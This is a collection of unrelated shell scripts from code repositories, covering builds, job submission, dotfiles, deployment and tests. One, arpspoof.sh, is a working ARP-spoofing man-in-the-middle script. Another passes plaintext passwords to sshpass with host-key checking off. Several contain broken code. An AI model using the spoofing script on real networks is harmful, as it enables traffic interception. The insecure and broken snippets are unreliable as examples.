echo "missing executable '${ARDUINO_TARGET_EXE}' -- did you compile?"
exit 1
fi
if [ "$TMP" = "" ] ; then
TMP="$(mktemp -d)"
trap '{ /bin/rm -rf "${TMP}"; }' EXIT
else
mkdir -p "$TMP"
fi
( "${ARDUINO_TARGET_EXE}" "$@"; echo "$?" > "$TMP/status" ) | tee "${ARDUINO_TARGET_EXE}.log"
STATUS="$(cat "$TMP/status")"
if [ -r "${ARDUINO_TARGET_EXE}.log" ]
then
./au2ju < "${ARDUINO_TARGET_EXE}.log" > "${ARDUINO_TARGET_EXE}.xml"
fi
exit $STATUS
| true
|
a7a63647d7eb71cfe1f5fb9c6b2338602d195290
|
Shell
|
Vaa3D/v3d_external
|
/build_VS2015.cmake
|
UTF-8
| 7,238
| 4.0625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
function download {
if [[ ! -e $2 ]]; then
echo "Downloading $1"
curl -L $1 -o $2
fi
}
shopt -s expand_aliases;
BUILD_HDF5=0
BOOST_MAJOR_VERSION=1_57
BOOST_VERSION=${BOOST_MAJOR_VERSION}_0
CMAKE_VERSION=2.8.12
CMAKE_ARGS=""
CMAKE_PLATFORM_ARGS=
CMAKE_BUILD="Release"
CMAKE_EXE=""
BUILD_DIR=`pwd`
ROOT_DIR=`pwd`
set -eu
KERNEL=(`uname -s | tr [A-Z] [a-z]`)
ARCH=(`uname -m | tr [A-Z] [a-z]`)
case $KERNEL in
darwin)
OS=macosx
;;
mingw*)
OS=windows
KERNEL=windows
;;
windows-x86_64)
;;
*)
OS=$KERNEL
;;
esac
case $ARCH in
arm*)
ARCH=arm
;;
i386|i486|i586|i686)
ARCH=x86
;;
amd64|x86-64)
ARCH=x86_64
;;
esac
PLATFORM=$OS-$ARCH
echo "Detected platform \"$PLATFORM\""
while [[ $# > 0 ]]; do
case "$1" in
-platform)
shift
PLATFORM="$1"
;;
-h5j)
CMAKE_ARGS+="-DUSE_FFMPEG:BOOL=ON -DUSE_X265:BOOL=ON -DUSE_HDF5:BOOL=ON"
BUILD_HDF5=1
;;
-qt5)
CMAKE_ARGS+=" -DFORCE_QT4:BOOL=OFF"
;;
-16)
CMAKE_ARGS+=" -DHIGH_BIT_DEPTH:BOOL=ON"
;;
-debug)
CMAKE_BUILD="Debug"
;;
install)
OPERATION=install
;;
clean)
OPERATION=clean
;;
clobber)
OPERATION=clobber
;;
*)
BUILD_DIR="$1"
;;
esac
shift
done
echo "Targeting platform \"$PLATFORM\""
echo "Root directory \"$ROOT_DIR\""
if [[ -z ${OPERATION:-} ]]; then
echo "Usage: build.cmake [-platform <name>] [-h5j] [-qt5] [-debug] <install | clean | clobber>"
echo "where possible platform names are: linux-x86, linux-x86_64, macosx-x86_64, windows-x86, windows-x86_64, etc."
echo " -h5j - builds for the Janelia Farm HDF variant. Enables building of FFmpeg, HDF5 and X265(HEVC)"
echo " -qt5 - build with Qt5 (experimental)"
echo " -debug - Generates a debug build (default is release)"
echo " clean - removes the current build for platform"
echo " clobber - cleans, and removes the current cmake directories"
exit 1
fi
boost_prefix=$BUILD_DIR/build_$PLATFORM/v3d_main/common_lib
CMAKE_PLATFORM_ARGS="-DBOOST_ROOT:PATH=$boost_prefix "
if [ $PLATFORM = "windows-x86_64" ]; then
CMAKE_PLATFORM_ARGS+="-DTIFF_INCLUDE_DIR:PATH=$ROOT_DIR/v3d_main/common_lib/include "
CMAKE_PLATFORM_ARGS+="-DTIFF_LIBRARY:PATH=$ROOT_DIR/v3d_main/common_lib/winlib64/libtiff.lib "
CMAKE_PLATFORM_ARGS+="-DFFTW_INCLUDE_DIR:PATH=$ROOT_DIR/v3d_main/common_lib/fftw-3.3.4-dll64 "
CMAKE_PLATFORM_ARGS+="-DFFTW_LIBRARY:PATH=$ROOT_DIR/v3d_main/common_lib/fftw-3.3.4-dll64/libfftw3f-3.lib"
fi
: "${CMAKE_DIR:=""}"
case $OPERATION in
install)
# See if the CMAKE_DIR is set
if [ ! "$CMAKE_DIR" = "" ]; then
if [[ -e $CMAKE_DIR ]]; then
CMAKE_EXE="$CMAKE_DIR/bin/cmake"
fi
fi
# If CMAKE_EXE is not set, then either find or build cmake
if [ "$CMAKE_EXE" = "" ]; then
if hash cmake 2>/dev/null; then
CMAKE_EXE="cmake"
else
if [[ ! -e cmake-$CMAKE_VERSION/bin/cmake ]]; then
if [[ ! -e cmake-$CMAKE_VERSION ]]; then
echo "Downloading cmake"
download http://www.cmake.org/files/v3.1/cmake-$CMAKE_VERSION.tar.gz cmake-$CMAKE_VERSION.tar.gz
tar xvfz cmake-$CMAKE_VERSION.tar.gz
fi
cd cmake-$CMAKE_VERSION
./configure --prefix=.
make
make install
cd ..
fi
CMAKE_EXE="../cmake-$CMAKE_VERSION/bin/cmake"
fi
fi
echo "Using $CMAKE_EXE"
if [[ ! -e $BUILD_DIR/build_$PLATFORM ]]; then
mkdir -p $BUILD_DIR/build_$PLATFORM/v3d_main/common_lib
fi
echo $boost_prefix
if [[ ! -e $boost_prefix/include ]]; then
echo "Unpacking Boost"
cd $boost_prefix
if [ $PLATFORM = "windows-x86_64" ]; then
if [[ ! -e boost_$BOOST_VERSION ]]; then
/c/Program\ Files/7-Zip/7z x -y $ROOT_DIR/v3d_main/common_lib/src_packages/boost_$BOOST_VERSION.tar.gz
/c/Program\ Files/7-Zip/7z x -y boost_$BOOST_VERSION.tar
fi
cd boost_$BOOST_VERSION
cmd //c .\\bootstrap.bat
cmd //c .\\b2.exe --toolset=msvc-14.0 address-model=64 --prefix=$boost_prefix install
else
tar xvf $ROOT_DIR/v3d_main/common_lib/src_packages/boost_$BOOST_VERSION.tar.gz
cd boost_$BOOST_VERSION
./bootstrap.sh --prefix=$boost_prefix
./b2 install
fi
cd ../../../../
fi
if [ $PLATFORM = "windows-x86_64" ]; then
if [[ ! -e $ROOT_DIR/v3d_main/common_lib/include/tiff.h ]]; then
echo "Configuring TIFF headers"
cd $ROOT_DIR/v3d_main/common_lib/build
/c/Program\ Files/7-Zip/7z x -y ../src_packages/tiff-4.0.2.tar.gz
cd tiff-4.0.2
nmake Makefile.vc
cp libtiff/tiff.h ../../include
cp libtiff/tiffconf.h ../../include
cp libtiff/tiffio.h ../../include
cp libtiff/tiffio.hxx ../../include
cp libtiff/tiffvers.h ../../include
cp libtiff/libtiff.lib ../../winlib64
cd ../../../..
fi
echo "Unpacking FFTW"
CMAKE_EXE+=" -G \"Visual Studio 14 2015 Win64\""
cd $ROOT_DIR/v3d_main/common_lib
if [[ ! -e fftw-3.3.4-dll64.tgz ]]; then
/c/Program\ Files/7-Zip/7z x -y fftw-3.3.4-dll64.tgz
fi
if [[ ! -e ffmpeg-2.5.2-win64 ]]; then
/c/Program\ Files/7-Zip/7z x -y ffmpeg-2.5.2-win64.tgz
fi
cd ../../
fi
cd $BUILD_DIR/build_$PLATFORM
echo $CMAKE_EXE -DCMAKE_BUILD_TYPE:STRING=$CMAKE_BUILD $CMAKE_ARGS $CMAKE_PLATFORM_ARGS $ROOT_DIR
eval $CMAKE_EXE -DCMAKE_BUILD_TYPE:STRING=$CMAKE_BUILD $CMAKE_ARGS $CMAKE_PLATFORM_ARGS $ROOT_DIR
if [ $PLATFORM = "windows-x86_64" ]; then
if [ $BUILD_HDF5 = 1 ]; then
echo "Building HDF5"
devenv Vaa3D.sln -project HDF5 -build $CMAKE_BUILD -out hdf5.txt
fi
echo "Building Vaa3D"
devenv Vaa3D.sln -build $CMAKE_BUILD -out all_build.txt
echo "Installing"
devenv Vaa3D.sln -project INSTALL -build $CMAKE_BUILD -out install.txt
echo "Done."
else
make
fi
;;
clean)
echo "Cleaning build_$PLATFORM directories"
if [[ -e $BUILD_DIR/build_$PLATFORM ]]; then
rm -rf $BUILD_DIR/build_$PLATFORM
fi
;;
clobber)
echo "Cleaning cmake directories"
if [[ -e cmake-$CMAKE_VERSION ]]; then
rm -rf cmake-$CMAKE_VERSION
fi
if [[ -e $BUILD_DIR/build_$PLATFORM ]]; then
rm -rf $BUILD_DIR/build_$PLATFORM
fi
;;
esac
| true
|
0cbfc6840484049a980a396fe5e29914b2c83fee
|
Shell
|
Landrylab/Gene_duplication_2019
|
/scripts_for_simulations/003_foldx_repair_slurm.sh
|
UTF-8
| 746
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# This code receives the name of a file that should be looked inside the 002_ins_res_alt_crd folder and passes it on to the FoldX RepairPDB function.
# $1 = input PDB without the 'pdb' extension
cat > $1_repair.sbatch << EOF
#!/bin/bash
#SBATCH -D /home/afcis2/FoldX_simulations
#SBATCH -J $1_repair
#SBATCH -o $1_repair.out
#SBATCH -c 1
#SBATCH -p ibismini
#SBATCH --time=1-00:00
#SBATCH --mem=51200
cp 002_ins_res_alt_crd/$1.pdb 003_repair
cd 003_repair
ln -s `which rotabase.txt` rotabase.txt
FoldX --command=RepairPDB --pdb=$1.pdb --ionStrength=0.05 --pH=7 --water=CRYSTAL --vdwDesign=2 --out-pdb=true --pdbHydrogens=false > $1_Repair.log
mkdir $1_Repair
mv $1_Repair?* $1_Repair
rm $1.pdb
EOF
sbatch $1_repair.sbatch
| true
|
963ee8dd6093a0d578515367bfcf108c2dc4646f
|
Shell
|
nneonneo/pwn-stuff
|
/misc/escencode_test.sh
|
UTF-8
| 1,467
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash -e
ESCENCODE="../escencode.py"
DIR=escencode_test
mkdir -p $DIR
cd $DIR
echo "[+] Making test files"
python -c 'import sys; sys.stdout.write("".join(chr(a)+chr(b) for a in xrange(256) for b in xrange(256)))' > test.bin
echo "[+] Testing C output"
cat > test.c <<EOF
char test[] =
$($ESCENCODE --style=c -W 80 test.bin)
;
#include <stdio.h>
int main() {
fwrite(test, 1, sizeof(test)-1, stdout);
}
EOF
gcc test.c -o test.c.exe
./test.c.exe > test.c.bin
cmp test.bin test.c.bin
echo "[+] Testing Python output"
cat > test.py <<EOF
import sys
sys.stdout.write(
$($ESCENCODE --style=python -W 80 test.bin)
)
EOF
python test.py > test.py.bin
cmp test.bin test.py.bin
echo "[+] Testing Ruby output"
cat > test.rb <<EOF
print $($ESCENCODE --style=ruby -W 80 test.bin)
EOF
ruby test.rb > test.rb.bin
cmp test.bin test.rb.bin
echo "[+] Testing Java output"
cat > test.java <<EOF
public class test {
public static final void main(String[] args) {
try {
System.out.write( ($($ESCENCODE --style=java -W 80 test.bin)).getBytes("ISO-8859-1"));
} catch(Exception e) {
e.printStackTrace();
System.exit(1);
}
}
}
EOF
javac test.java
java test > test.java.bin
cmp test.bin test.java.bin
echo "[+] Testing Echo output"
cat > test.echo.sh <<EOF
$($ESCENCODE --style=echo -W 80 test.bin)
EOF
bash test.echo.sh > test.echo.bin
cmp test.bin test.echo.bin
echo '[+] All tests passed!'
| true
|
8b5c62593649cb4058996093b9af78f52045d557
|
Shell
|
Wooork/Telegram-iOS
|
/third-party/webrtc/build-webrtc-buck.sh
|
UTF-8
| 1,168
| 3.015625
| 3
|
[] |
no_license
|
#/bin/sh
set -x
set -e
BUILD_DIR="$1"
ARCH="$2"
echo "BUILD_DIR=$BUILD_DIR"
echo "ARCH=$ARCH"
export PATH="$PATH:$BUILD_DIR/depot_tools_sources/depot_tools"
rm -rf "$BUILD_DIR/webrtc-ios/src/openssl"
cp -R "$BUILD_DIR/openssl" "$BUILD_DIR/webrtc-ios/src/"
cp -R "$BUILD_DIR/libssl" "$BUILD_DIR/webrtc-ios/src/"
pushd "$BUILD_DIR/webrtc-ios/src"
mv openssl/lib/libcrypto.a openssl/
mv libssl/lib/libssl.a openssl/
OUT_DIR="ios"
if [ "$ARCH" == "arm64" ]; then
OUT_DIR="ios_64"
elif [ "$ARCH" == "x64" ]; then
OUT_DIR="ios_sim"
fi
buildtools/mac/gn gen out/$OUT_DIR --args="use_xcode_clang=true "" target_cpu=\"$ARCH\""' target_os="ios" is_debug=false is_component_build=false rtc_include_tests=false use_rtti=true rtc_use_x11=false use_custom_libcxx=false use_custom_libcxx_for_host=false rtc_build_ssl=false rtc_build_examples=false rtc_build_tools=false ios_deployment_target="9.0" ios_enable_code_signing=false is_unsafe_developer_build=false rtc_enable_protobuf=false rtc_include_builtin_video_codecs=true rtc_build_libvpx=true rtc_libvpx_build_vp9=true rtc_use_gtk=false rtc_use_metal_rendering=true'
ninja -C out/$OUT_DIR framework_objc_static
popd
| true
|
5545b5715bf5e08482d759b87548f1bfad129f17
|
Shell
|
patilswati27/ShellScript
|
/Basic/table.sh
|
UTF-8
| 145
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Enter a Number"
read no
echo "Enter Range"
read r
i=0
while [ $i -le $r ]
do
echo "`expr $no^$r`"
r=`expr $r - 1`
done
| true
|
55ab04fa23d429de19497e1b19b8fd43962f6cd9
|
Shell
|
cym13/scripts
|
/arpspoof.sh
|
UTF-8
| 1,151
| 3.984375
| 4
|
[] |
no_license
|
#!/usr/bin/sh
if [ -z $(which nemesis) ] ; then
echo "nemesis needed, check in your repositories."
exit
elif [ $# -ne 3 ] ; then
echo "Usage: arpspoof.sh INTERFACE TARGET_IP HOST_IP"
exit
elif [ $(whoami) != "root" ] ; then
sudo "$0" $@
exit
fi
# nemesis_req $1=from_ip $2=to_ip $3=to_mac
nemesis_req () {
nemesis arp -v -r -d $if -S $1 -D $2 -h $own_mac -m $3 -H $own_mac -M $3||\
echo -e "\e[0;31m[ERROR IN REDIRECTION]\e[0m"
}
if=$1
own_ip=$(ip a|sed -n "/192.168.[01].[^\/]\+/s/^.*\(192[^\/]\+\)\/.*$/\1/p")
echo Own ip: $own_ip
re="/$if/,/^[0-9]/s/^.*ether \([0-9a-f]\{2\}\(:[0-9a-f]\{2\}\)\{5\}\).*$/\1/p"
own_mac=$(ip a|sed -n "$re")
echo Own mac: $own_mac
target_ip=$2
echo Target ip: $target_ip
target_mac=$(arp | grep $target_ip | cut -c 34-50)
echo Target mac: $target_mac
host_ip=$3
echo Host ip: $host_ip
host_mac=$(arp | grep $host_ip | cut -c 34-50)
echo Host mac: $host_mac
while [ 'This script is 42 lines long, do not break it!' ] ; do
echo -e "\e[0;32mRedirecting...\e[0m"
nemesis_req $host_ip $target_ip $target_mac
nemesis_req $target_ip $host_ip $host_mac
sleep 10
done
| true
|
7b5b96508bdc3e6e14bfa5ae2bd52071b41fe05e
|
Shell
|
SSchott/haddock3
|
/bin/activate
|
UTF-8
| 245
| 2.5625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
export HADDOCK3=/home/rodrigo/haddock3
export CNS_EXE=/home/rodrigo/software/CNS/bin/cns
if [[ -z "${PYTHONPATH}" ]]; then
PYTHONPATH=${HADDOCK3}
else
PYTHONPATH=${PYTHONPATH}:${HADDOCK3}
fi
export PATH=${PATH}:${HADDOCK3}/bin
| true
|
7db5b6d45f8f9095fb29981d634518bc09c8867e
|
Shell
|
jeonghoonkang/BerePi
|
/apps/camera/crontab.sh
|
UTF-8
| 1,049
| 2.609375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
##
*/30 * * * * bash /home/cam.sh > /home/.../.../log/crontab.camera.log 2>&1
# 아래 실행 명령은 crontab 에서는 동작하지 않음
# *.sh 파일로 저장하고 실행해야 함, 위 처럼, bash /home/tinyos/cam.sh 로 실행
# fswebcam -r 1280*960 /home/.../web/png/image_$(date '+%Y-%m-%d_%H:%M:%S').jpg
# cam.sh
#
#dest='{SRC}'
#
# fswebcam -r 1280*960 /home/.../web/png/image_$(date '+%Y-%m-%d_%H:%M:%S').jpg
#
# @hourly echo "password" | sudo -S rm somefile
# sudo chowm www-data -R /home/.../web/png
# sudo find /home/.../web/png -name image_* -mtime +14 -delete
# sudo rsync -avhz --partial --progress /home/.../web/png $dest
# sleep 30
# sudo docker exec -i -u 33 ..._app_1 php occ files:scan --all
#
# sudo chown www-data -R /home/tinyos/devel_opment/nextcloud/volume/nextcloud_volume/data/tinyos/files/Photos/office
# dest='/home/...id.../devel_opment/nextcloud/volume/nextcloud_volume/data/...id.../files/Photos'
# (참고) rsync --rsh="sshpass -p myPassword ssh -l username" server.example.com:/var/www/html/ /backup/
| true
|
f4922418b7a1f343da26e52567ef94f6467d5968
|
Shell
|
gnpok/shell
|
/mysqlOperation/webService_isRunning.sh
|
UTF-8
| 760
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
#检测服务是否在运行,若不在则启动
soft=(nginx php-fpm mysqld redis)
for S in "${soft[@]}";do
ps=`pstree | grep $S`
if [ "$ps" == "" ]; then
`service $S start`
fi
done
#只检测mysql是否在运行建议使用下面
result=`/usr/bin/mysqladminping`
expected='mysqld is alive'
if[[ "$result"!= "$expected"]]
then
echo"It's dead - restart mysql"
# email subject
SUBJECT="[MYSQL ERROR] - Attempting to restart service"
# Email To ?
EMAIL="info@endyourif.com"
# Email text/message
EMAILMESSAGE="/tmp/emailmessage.txt"
echo"$result was received"> $EMAILMESSAGE
echo"when we were expected $expected">>$EMAILMESSAGE
# send an email using /bin/mail
mail -s "$SUBJECT""$EMAIL"< $EMAILMESSAGE
sudo/etc/init.d/mysqlrestart
fi
| true
|
96e0b586aa85641b4f04193f71ecd67c85ea56b6
|
Shell
|
vsmaxim/infotecs-sysadm-test
|
/pskiller
|
UTF-8
| 666
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Kills processes from sudo via ssh
if [[ -z $3 ]]; then
echo "Usage: pskiller ids /path/to/passwds.txt [ip/hostname] ..." >& 2
exit 1
fi
exec 3< $2
read username <&3
read password <&3
read killingUsername <&3
read killingPassword <&3
exec 3<&-
for host in ${@:3}; do
sshpass -p ${password} ssh -o "StrictHostKeyChecking no" -T ${username}@${host} << EOF
if [[ -z "${killingUsername}" ]]; then
echo ${password} | sudo -S kill \$(pgrep $1) || sudo -S kill -9 \$(pgrep $1)
else
echo Hexxxx > ~/test.txt
echo ${killingPassword} | sudo -S -u ${killingUsername} kill \$(pgrep $1) || sudo -S -u ${killingUsername} kill -9 \$(pgrep $1)
fi
EOF
done
| true
|
2383c12709d0a422e4cb26db221362f6e15a2b61
|
Shell
|
nvanderperren/ResurrectionLab
|
/liberaal_archief_mac_floppies.sh
|
UTF-8
| 2,875
| 3.875
| 4
|
[
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
#
# script to more or less automate the imaging of Macintosh formatted floppies
# for Liberaal Archief
# author: Nastasia Vanderperren (PACKED vzw)
# script written for macOS and OS X systems
# prerequisites: ClamAV, kryoflux software, hfsutil, siegfried and bagit.py
# source: John Durno, http://journal.code4lib.org/articles/11986
#
#############################################################
# parameters
if [ $# == 0 ]
then # if there is no parameter
echo "No arguments found."
echo "Give a name to the floppy image: "
read UI
else
UI=$1 # this is the name you give to the image
fi
#create directory for the image and its metadata
echo "Creating folder structure for image and its metadata..."
mkdir $UI
cd $UI
mkdir image content meta
echo "Done creating folder structure!"
# create an image of the files with the kryoflux
echo "Creating image with the kryoflux controller..."
# create Apple DOS 400/800K sector image
dtc -p -fimage/$UI/$UI -i0 -fimage/$UI.img -i9 2>&1 | tee meta/image_$UI.log
diskimage=image/$UI.img
rsync -a $diskimage handlingcopy.img # create handling copy
handling=handlingcopy.img
echo "Done creating image!"
# create an MD5 checksum
echo "Creating md5 checksum..."
md5 $diskimage > meta/checksum.txt
echo "Done creating checksum!"
# identify the file system
echo "Identifying the file system..."
disktype $handling > meta/disktype.txt
echo "Done identifying the file system!"
# get the contents and structure of the files on the disk
echo "Extracting files and folders of image..."
hmount $handling > meta/hmount.txt # keep this until better way found to get this information
hls -i -a -l -R > meta/index.txt
# hcopy -m :* content/
humount
# maybe better this way:
hdiutil attach -readonly $handling | sed -E 's/[[:space:]]+/ /g' > mount.txt # store information in helper txt file
# use the mount.txt file to split mounting location and device location in variables
mount_and_dev_string=$(<mount.txt)
dev_location=${mount_and_dev_string%%' '*}
mount_location=${mount_and_dev_string#*' '}
if [ ! -z "$mount_location" ]; then
rsync -ra "$mount_location"/ content/ # copy files using rsync
fi
hdiutil detach "$dev_location"
rm mount.txt # delete helper txt file
echo "Done extracting files and folders!"
# to do: file characterization"
echo "Start characterizing the files of the disk..."
sf -hash md5 -z -csv content > meta/file_identification.csv # creates also checksum for each file
echo "Done characterizing files!"
# scan the image
echo "Scanning the image"
freshclam -update # update virus database
clamscan -r --bell $handling content/ > meta/virusscan.txt
echo "Done scanning the image!"
# delete handlingcopy
rm $handling
# place everything in a bag
#echo "Creating BagIt for files..."
#cd ..
#bagit.py $UI
#echo "Done creating BagIt!"
echo "Done processing Macintosh floppy!"
echo -ne '\a'
| true
|
49e05f90aa13ddf6477162c8c2698676e4649802
|
Shell
|
liguang8212/python-code-encryption
|
/build_py_to_pyc.sh
|
UTF-8
| 472
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/sh
##########################################################
# Author: LiGuang
# Create Date: 2021/07/22
# Version: 1.0
##########################################################
src_dir=$1
if [ ! -d $src_dir ]; then
echo "source code dir does not exist!"
fi
python -O -m compileall -b $src_dir
find $src_dir -name '*.py' -type f -print -exec rm {} \;
echo "Finished to romve the py files "
#python -m py_compile test.py
#python -O -m py_compile test.py
| true
|
86caaa59f56d68374066a01b54df20cf6f5620b0
|
Shell
|
jcherven/dotfiles-debian
|
/initDotfiles.sh
|
UTF-8
| 2,188
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
# Some setup of directories that will be used by dotfiles
# Listing of directories needed by dotfiles. Add new needed entries to this array.
DIRECTORIES=(
# directories needed in ~/.config
"$HOME/.config/nvim"
"$HOME/.config/git"
)
# Create directories defined in DIRECTORIES array. Requires /bin/bash for C-style looping to access array indexes
for ((j=0; j<${#DIRECTORIES[@]}; ++j)); do
if [ ! -d "${DIRECTORIES[$j]}" ]; then
mkdir -p "${DIRECTORIES[$j]}"
fi
done
# Symlinked files
# Listing of symlinks for files that are located in ~/
FILESLOCAL=( # items correspond to FILESLINKED by index order
# Xorg configs
"$HOME/.Xresources"
# bash and other shell configs
"$HOME/.bash_profile"
"$HOME/.bashrc"
"$HOME/.profile"
# tmux
"$HOME/.tmux.conf"
# git global configs
"$HOME/.config/git/config"
"$HOME/.config/git/ignore"
# other applications
"$HOME/.lynxrc"
)
FILESLINKED=(
# Xorg configs
"$HOME/dotfiles-debian/Xresources"
# bash and other shell configs
"$HOME/dotfiles-debian/bash_profile"
"$HOME/dotfiles-debian/bashrc"
"$HOME/dotfiles-debian/profile"
# tmux
"$HOME/dotfiles-debian/tmux.conf"
# git global configs
"$HOME/dotfiles-debian/config/git/config"
"$HOME/dotfiles-debian/config/git/ignore"
# other applications
"$HOME/dotfiles-debian/lynxrc"
)
# Set the ~/ dot file symlinks defined in FILESLINKED {{{
# requires a c-style loop to access array index numbers
for ((i=0; i<${#FILESLOCAL[@]}; ++i)); do
if [ -e "${FILESLOCAL[$i]}" ];
then
mv "${FILESLOCAL[$i]}" "${FILESLOCAL[$i]}.old.$(date +%c)"
fi
ln -s "${FILESLINKED[$i]}" "${FILESLOCAL[$i]}"
done
# }}}
# Call software bootstrap install/config scripts {{{
# MacOS 13
#if [[ "$OSTYPE" == "darwin"* ]]; then
# # Install the OS's basic environment bootstrap apps (currently supports MacOS)
# source "$HOME/dotfiles/initscripts/swbootstrap.sh"
# # Set macos 13 system settings
# source "$HOME/dotfiles/initscripts/macosinit.sh"
#fi
# Debian
#if [[ "$OSTYPE" == "linux-gnu" ]]; then
# source "$HOME/dotfiles/initscripts/debianinit.sh"
#fi
#}}}
echo "initDotfiles.sh has completed."
# ex: set foldmethod=marker:
| true
|
11e639531f863a2c732e53a464a1a4e4b88a7021
|
Shell
|
nicolasgalvez/procyon-wordpress
|
/bin/remote-setup
|
UTF-8
| 1,552
| 4.0625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# This script will setup git on the remote Digital Ocean server.
# It will create a branch called 'live' so you can deploy to the live server with a git push.
# It will move the current website to a directory called html.bak.
# Based on the steps here: https://www.digitalocean.com/community/tutorials/how-to-set-up-automatic-deployment-with-git-with-a-vps
# DO NOT USE on an existing server unless you really know what you are doing.
source bin/include/loadenv
set -e
echo "WARNING: This script will modify your live server. Do not run on an existing wordpress setup unless you are sure you know what you are doing."
read -p "Continue (y/n)?" choice
case "$choice" in
y|Y ) echo "yes";;
n|N ) echo "no";;
* ) echo "invalid";;
esac
# Setup git on the remote server using the script in includes dir.
ssh "$REMOTE_USER"@"$REMOTE_HOST" 'bash -s' < bin/include/remote-git-setup
# Create remote git branch
git remote add live ssh://"$REMOTE_USER"@"$REMOTE_HOST"/var/repo/live.git
# git remote add staging ssh://$REMOTE_USER@$REMOTE_HOST/repo/staging.git
# Do first deploy
git push live -f
# Move the default wordpress installation, and copy the generated htaccess and wp-config.php.
ssh "$REMOTE_USER"@"$REMOTE_HOST" 'cd /var/www
mv html html.bak
ln -s live/wordpress html
cp html.bak/wp-config.php html/
cp /var/www/html.bak/.htaccess /var/www/live/wordpress/'
# change permissions to the web user or uploads and stuff like that won't work.
ssh "$REMOTE_USER"@"$REMOTE_HOST" 'chown -R www-data:www-data /var/www/html/*'
| true
|
d573a282e5cb5fd580c0b86168f3a912ddcbc0ba
|
Shell
|
mattbdean/CyanideViewer
|
/scripts/pull_db.sh
|
UTF-8
| 954
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
# http://stackoverflow.com/a/246128/1275092
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source "$DIR"/settings.sh
# First, run as the application and make the database world readable and world writable
# Then, pull the database
# Finally, run as the application and make the database readable and writable to the owner
# http://stackoverflow.com/a/18472135/1275092
if adb shell "run-as $PACKAGE chmod 666 $ANDROID_LOCATION" \
&& adb pull "$ANDROID_LOCATION" "$DIR/$DB_NAME" \
&& adb shell "run-as $PACKAGE chmod 600 $ANDROID_LOCATION"; then
# Only launch the browser if the file was pulled successfully
if command -v "$PREFERRED_BROWSER" 2>/dev/null; then
# SQLiteBrowser exists, use it
"$PREFERRED_BROWSER" "$DIR/$DB_NAME"
elif command -v sqlite3 2>/dev/null; then
# Use the command line instead
sqlite3 "$DIR/$DB_NAME"
else
echo >&2 "The database was pulled, but no application was found to open it."
fi
fi
| true
|
d5782d3c6a251459f2469d29ffb64d6d7858dd4f
|
Shell
|
lorthal/IAD2
|
/runpart1.sh
|
UTF-8
| 670
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
p="/mnt/d/Semestr 6/IAD/Zad2"
n=2
e=1000
l=0.6
s=3
while (( $n <= 20 ));
do
"$p""/runprog.sh" -e $e -n $n -l $l -s $s -m "neural_gas" -o "$n""_neural_gas_square_circle_output.txt" -p "square_filled -3 0 1 150 circle 3 0 2 150"
"$p""/runprog.sh" -e $e -n $n -l $l -s $s -m "neural_gas" -o "$n""_neural_gas_square_output.txt" -p "square_filled 0 0 3 300"
"$p""/runprog.sh" -e $e -n $n -l $l -s $s -m "kohonen" -o "$n""_kohonen_square_circle_output.txt" -p "square_filled -3 0 1 150 circle 3 0 2 150"
"$p""/runprog.sh" -e $e -n $n -l $l -s $s -m "kohonen" -o "$n""_kohonen_square_output.txt" -p "square_filled 0 0 3 300"
n=$((n+2))
done
| true
|
7d59b9772cd2138a481964f895cfc5b6fa7ab1be
|
Shell
|
Piyoshi/dotfiles
|
/.zshrc
|
UTF-8
| 1,390
| 2.578125
| 3
|
[] |
no_license
|
fpath+=~/.zfunc
source ~/alias
source ~/.myshrc
# VCS情報を取得するzshの便利関数vcs_infoを使う
autoload -Uz vcs_info
# branch情報の表示フォーマットの指定
# %b ブランチ情報
# %a アクション名(mergeなど)
zstyle ':vcs_info:*' formats '[%b]'
zstyle ':vcs_info:*' actionformats '[%b|%a]'
precmd () {
psvar=()
LANG=en_US.UTF-8 vcs_info
[[ -n "$vcs_info_msg_0_" ]] && psvar[1]="$vcs_info_msg_0_"
}
# 名前で色を付けるようにする
autoload colors
colors
# LS_COLORSを設定しておく
export LS_COLORS='di=34:ln=35:so=32:pi=33;ex=31;bd=46;34;cd=43;34;su=41;30:sb=46;30:tw=42;30:ow=43;30'
# ファイル補完候補に色を付ける
zstyle ':completion:*' list-colors ${(s.:.)LS_COLORS}
autoload -U compinit
compinit -u#
# 補完候補の大文字小文字の区別なしに表示する(ただし大文字の補完は大文字の候補にマッチ)
zstyle ':completion:*' matcher-list '' 'm:{a-z}={A-Z}' '+m:{A-Z}={a-z}'
# 補完候補に色づけする
zstyle ':completion:*' list-colors ${(s.:.)LS_COLORS}
# 補完候補を十字キーで選択
zstyle ':completion:*:default' menu select=2
#THIS MUST BE AT THE END OF THE FILE FOR SDKMAN TO WORK!!!
export SDKMAN_DIR="/Users/satopiyo/.sdkman"
[[ -s "/Users/satopiyo/.sdkman/bin/sdkman-init.sh" ]] && source "/Users/satopiyo/.sdkman/bin/sdkman-init.sh"
| true
|
d9168bae702250d4b57bb049be8e7d61da657235
|
Shell
|
eXolnet/exolnet-macos-toolbox
|
/bin/exo-software-select
|
UTF-8
| 1,461
| 4.15625
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/usr/bin/env bash
#
# Script setup
#
# Define toolbox directory if not set
if [[ -z "$TOOLBOX" ]]; then
TOOLBOX="$HOME/.exolnet/toolbox"
fi
# Check if toolbox directory exists
if [[ ! -d "$TOOLBOX" ]]; then
echo "Directory ~/.exolnet does not exists, exiting ..."
exit 1
fi
# Source helpers
. "$TOOLBOX/lib/include"
#
# Script checks
#
# Check if homebrew shell environment variables are defined
if [[ -z "$HOMEBREW_PREFIX" ]]; then
echo
echo "Homebrew environment variables are missing."
echo "They must be present in your shell profile in order for this script to run."
exit 1
fi
# Check if command was ran as root.
if [[ $(id -u) -eq 0 ]]; then
echo
